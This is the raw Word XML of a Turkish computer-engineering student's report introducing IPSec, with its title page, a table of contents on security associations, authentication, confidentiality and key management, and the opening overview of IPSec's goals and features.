    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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Pr="00226167"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lastRenderedPageBreak/>
        <w:t>Adı</w:t>
      </w:r>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>:Halil Durmuş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00226167"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t>Numara:150757017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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t xml:space="preserve">Bölüm  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>:Bilgisayar Mühendisliği(İ.Ö)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00226167" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00226167" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00226167">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bölüm 2.2.12  :IP Güvenliğine Giriş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İçindekiler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                     Sayfa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pP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 xml:space="preserve">                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>IPSec'e Giriş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   </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2                       </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Özellikler</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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D726FE"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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Dönüşüm Bağımsızlığı ile Ayrı Gizlilik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ve Kimlik Doğrulama İşlevleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A"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Tek Yönlü Kurulum ile Ağ Katmanı (IP) Uygulaması</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A"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Ana Bilgisayar ve Ağ Geçidi Topolojileri</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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anahtar yönetimi</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3-4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Uygulama ve Yapılar</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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A"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Güvenlik Birlikleri (SA)</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5-6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A"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Güvenlik Parametreleri Endeksi (SPI)</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6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A"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Kimlik Doğrulama Fonksiyonu</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6-7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gizlilik İşlevi</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7-8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Anahtar Yönetimi</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8-9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00EC731D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC731D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">İnternet Güvenliği Birliği ve Anahtar </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC731D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EC731D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EC731D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>9-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC731D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yönetimi Protokolü (ISAKMP)</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11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00EC731D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bulgular</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12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Özet</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12-13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A"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15113A"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40"/>
          <w:szCs w:val="40"/>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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="0015113A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>IPSec'e Giriş</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0015113A"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0C4B77">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>IP Güvenlik Protokolü Çalışma Grubu (IPSec), 1992 yılında İnternet Mühendisliği Görev Gücü (IETF) tarafından IP sürüm 4 ve ortaya çıkan sürüm 6 protokollerinde gizlilik ve kimlik doğrulama hizmetlerini uygulamak için standart bir yöntem geliştirmek üzere kuruldu. akılda çeşitli özgül hedefleri vardı. Mimarlığın geniş çapta benimsenmesi için esnek olması gerekirdi. Şifreleme teknolojisindeki değişikliklerin yanı sıra şifreleme kullanımına ilişkin uluslararası kısıtlamaları da barındırabilmelidir. İkinci olarak, mimarlık, standart veya yayın (çok noktaya yayın) modlarında tüm istemci IP protokollerini (yani, İletim Kontrol Protokolü veya TCP, Kullanıcı Datagram Protokolü veya UDP) desteklemelidir. Üçüncüsü, iki ana bilgisayar veya birden fazla ana bilgisayar, iki alt ağ veya çoklu alt ağ veya bir ana bilgisayar ve alt ağ kombinasyonu arasındaki iletişimi sağlayabilmelidir. Son olarak, şifreleme anahtarlarını otomatik olarak dağıtmak için bir yöntem olması gerekiyordu. Bu bölüm, IPSec güvenlik mimarisinin temel özelliklerini, ana bileşenlerini ve uyum için asgari zorunlu gereksinimleri kapsayacaktı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3C2971"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3C2971">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">IPSEC standart ip paketlerine </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2971">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>uygulanır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2971">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Temel amaç verilerin şifreleme yöntemi ile güvenliğinin sağlanması ve doğrulama mekanizmalarının işletilmesidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="000C4B77"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E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>METERYAL VE YÖNTEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AF0CDE" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0CDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.Özellikler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IPSec'in hedefleri aşağıdaki temel mimari özelliklere dönüştürülmüştür.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00E43527" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E43527">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dönüşüm Bağımsızlığı ile Ayrı Gizlilik ve Kimlik Doğrulama İşlevleri</w:t>
      </w:r>
    </w:p>
